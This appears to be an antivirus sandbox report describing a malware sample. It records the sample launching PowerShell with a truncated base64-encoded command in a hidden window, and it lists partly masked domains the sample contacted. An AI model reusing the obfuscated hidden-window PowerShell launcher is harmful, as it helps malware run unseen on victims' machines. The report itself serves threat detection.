Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHIAcwBlAHAAdQBkAHgAZgB2AHMAPQAnAFEAbQBxAHkAZQByAHEAYgAnADsAJABOAHcAYgB4AGUAbQBkAGwAYwB4AHUAZAB4AC...
Network activity
Connects to
- 'ze####reation.co.uk':443
- 'pa####project.net':443
- 'go###akidz.club':443
- 'st####giceis.com':443
TCP
Other
- 'pa####project.net':443
- 'st####giceis.com':443
UDP
- DNS ASK ze####reation.co.uk
- DNS ASK pa####project.net
- DNS ASK fa######ectsolutions.com
- DNS ASK go###akidz.club
- DNS ASK st####giceis.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHIAcwBlAHAAdQBkAHgAZgB2AHMAPQAnAFEAbQBxAHkAZQByAHEAYgAnADsAJABOAHcAYgB4AGUAbQBkAGwAYwB4AHUAZAB4AC...' (with hidden window)
